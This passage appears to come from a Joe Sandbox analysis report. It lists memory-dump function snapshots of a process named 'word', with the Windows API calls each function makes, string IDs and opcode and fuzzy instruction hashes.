                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: '$X1
                                                                    • API String ID: 3850602802-1132667850
                                                                    • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                    • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                    • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                    • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: X1
                                                                    • API String ID: 0-2397719451
                                                                    • Opcode ID: 633f152619b8c30162dc95440fdbfca099532ca417aaceaec9bd175afbce1397
                                                                    • Instruction ID: 4fa5f01c85a4c09be7d325946a2a49cd9db50b3972f2018ab6b13a1314af769f
                                                                    • Opcode Fuzzy Hash: 633f152619b8c30162dc95440fdbfca099532ca417aaceaec9bd175afbce1397
                                                                    • Instruction Fuzzy Hash: DC21B272244210ABF3109B49AD84FBBB3A8EBE5721F10452FF240E61D0D6A6A8129669
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                    • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                    • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 0045125D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MoveWindow
                                                                    • String ID: Listbox
                                                                    • API String ID: 3315199576-2633736733
                                                                    • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                    • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                    • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                    • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                    • GetVolumeInformationW.KERNEL32 ref: 0045D2C7
                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume
                                                                    • String ID: HH
                                                                    • API String ID: 2507767853-2761332787
                                                                    • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                    • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                    • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                    • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                    • GetVolumeInformationW.KERNEL32 ref: 0045D4CE
                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume
                                                                    • String ID: HH
                                                                    • API String ID: 2507767853-2761332787
                                                                    • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                    • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                    • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                    • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                    • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: msctls_trackbar32
                                                                    • API String ID: 3850602802-1010561917
                                                                    • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                    • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                    • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                    • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                    APIs
                                                                      • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                    • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
                                                                    • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                    • inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                    • String ID: HH
                                                                    • API String ID: 1515696956-2761332787
                                                                    • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                    • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                    • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                    • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                    APIs
                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                    • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                    • SetMenuItemInfoW.USER32 ref: 00449817
                                                                    • DrawMenuBar.USER32(?,?,00000000,?), ref: 00449828
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$InfoItem$Draw_malloc
                                                                    • String ID: 0
                                                                    • API String ID: 772068139-4108050209
                                                                    • Opcode ID: 1e2c3b12f77bf4e0e6b1b5ed1ab568a7a6fe5d23a54b7b6b03961fe9addc7c7a
                                                                    • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                    • Opcode Fuzzy Hash: 1e2c3b12f77bf4e0e6b1b5ed1ab568a7a6fe5d23a54b7b6b03961fe9addc7c7a
                                                                    • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 0044A37C
                                                                    • GetFocus.USER32 ref: 0044A384
                                                                    • SendMessageW.USER32(?,000000B0,-000001B0,000001B4), ref: 0044A3F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: FocusForegroundMessageSendWindow
                                                                    • String ID: X1
                                                                    • API String ID: 944890605-2397719451
                                                                    • Opcode ID: 90726ff0006992839abc6d27306098825af4dbfcbad5bf8d3aa395912d22fe36
                                                                    • Instruction ID: c96dbd3af6c5a13cf066609db195d3b9a892d089c32e0a7510d993dcc5c4d347
                                                                    • Opcode Fuzzy Hash: 90726ff0006992839abc6d27306098825af4dbfcbad5bf8d3aa395912d22fe36
                                                                    • Instruction Fuzzy Hash: F1112F351802419BC7208F28D849EA77B71EB8A720F18065DFC4187391EB785893CB59
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 0044A37C
                                                                    • GetFocus.USER32 ref: 0044A384
                                                                    • SendMessageW.USER32(?,000000B0,-000001B0,000001B4), ref: 0044A3F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: FocusForegroundMessageSendWindow
                                                                    • String ID: X1
                                                                    • API String ID: 944890605-2397719451
                                                                    • Opcode ID: 55901db6c8d2e617757f75f6a9cc8ea1ad95b679d72c4375ee8970e73f0fc9c0
                                                                    • Instruction ID: 22bd45665fc9576d9632a8de694c1cf6a1f999350c1115eace43a942eb161fba
                                                                    • Opcode Fuzzy Hash: 55901db6c8d2e617757f75f6a9cc8ea1ad95b679d72c4375ee8970e73f0fc9c0
                                                                    • Instruction Fuzzy Hash: DF0188345402019BD7209F28D848A6B7B61EB8A724F28466EFC14973E1EB796892CB59
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: AllocTask_wcslen
                                                                    • String ID: hkG
                                                                    • API String ID: 2651040394-3610518997
                                                                    • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                    • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                    • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                    • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                    • API String ID: 2574300362-1816364905
                                                                    • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                    • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                    • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                    • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004343DE
                                                                    • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: ICMP.DLL$IcmpSendEcho
                                                                    • API String ID: 2574300362-58917771
                                                                    • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                    • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                    • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                    • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0043440D
                                                                    • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: ICMP.DLL$IcmpCloseHandle
                                                                    • API String ID: 2574300362-3530519716
                                                                    • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                    • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                    • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                    • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0043443C
                                                                    • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: ICMP.DLL$IcmpCreateFile
                                                                    • API String ID: 2574300362-275556492
                                                                    • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                    • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                    • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                    • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040EE7B
                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: IsWow64Process$kernel32.dll
                                                                    • API String ID: 2574300362-3024904723
                                                                    • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                    • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
                                                                    • Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                    • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    • Opcode ID: fb09a12c6e05ddf126e49a888e2ae9f1d35fb9e74586dd8a58b9832368be32d6
                                                                    • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                    • Opcode Fuzzy Hash: fb09a12c6e05ddf126e49a888e2ae9f1d35fb9e74586dd8a58b9832368be32d6
                                                                    • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                    APIs
                                                                    • __flush.LIBCMT ref: 00414630
                                                                    • __fileno.LIBCMT ref: 00414650
                                                                    • __locking.LIBCMT ref: 00414657
                                                                    • __flsbuf.LIBCMT ref: 00414682
                                                                      • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                      • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                    • String ID:
                                                                    • API String ID: 3240763771-0
                                                                    • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                    • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                    • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                    • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                    APIs
